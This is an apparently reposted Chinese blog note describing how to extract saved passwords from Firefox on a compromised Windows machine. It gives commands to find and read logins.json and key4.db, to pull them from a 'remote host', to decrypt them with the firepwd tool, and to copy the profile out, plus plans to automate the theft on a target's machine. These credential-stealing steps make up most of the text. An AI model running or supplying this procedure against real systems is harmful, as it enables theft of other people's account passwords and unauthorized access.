碼上快樂

相關內容    簡體    繁體

Firefox 密碼脫取

本文轉載自   查看原文   2020-07-02 19:37   538 

Firefox 密碼脫取

正常獲取

訪問 about:logins

配置文件獲取

信息:

  • Website address
  • Username
  • Password
  • Created
  • Last modified
  • Last used

保存位置

%APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\ #xxxxxxxx 為隨機字母和數字的組合

logins.json文件

dir %APPDATA%\Mozilla\Firefox\Profiles\*logins.json /s /b

查看內容

type   C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\xx.default-release\logins.json

可以查看到,所記錄的URL,用戶名,加密后的密碼。創建時間等信息。

工具firepwd

https://github.com/lclevy/firepwd

python3 -m pip install -r requirements.txt ##安裝 PyCryptodome>=3.9.0   pyasn1>=0.4.8

下載遠程主機的 C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\xx.default-release\ 目錄下的

  • key4.db
  • logins.json

本地執行

python firepwd.py -d new_db\

獲取到賬號密碼。

Firefox 配置文件導出

wmic process where name='firefox.exe' get executablepath,processid ##查看火狐瀏覽器位置
firefox.exe -profile C:\Windows\temp\data1 #啟動firefox 並導出

會將Firefox 配置文件導入到指定目錄。

未踩的坑

Master Password # 用戶手工加了個面膜 (暫時沒有遇到目標自己去做這件事,就先不研究了)

如有遇到,解密,用上面的腳本 加-p 參數 輸入Master Password的密碼 即可,

Todo

1.如果可以在對方機器執行EXE,自己打包python腳本 進行自動化獲取

2.或者用go自己寫一個..


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Firefox密碼讀取 如何查看Firefox中保存的登錄密碼 Firefox管理已經保存的賬號和密碼 各種脫褲方法 Vue 脫坑記 sourcetree 拉取 一直讓輸入密碼 SQLMAP脫褲 域PC脫域 Python + Selenium + Firefox 使用代理 auth 的用戶名密碼授權 滲透技巧-橫向滲透-導出Firefox等瀏覽器中保存的密碼
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM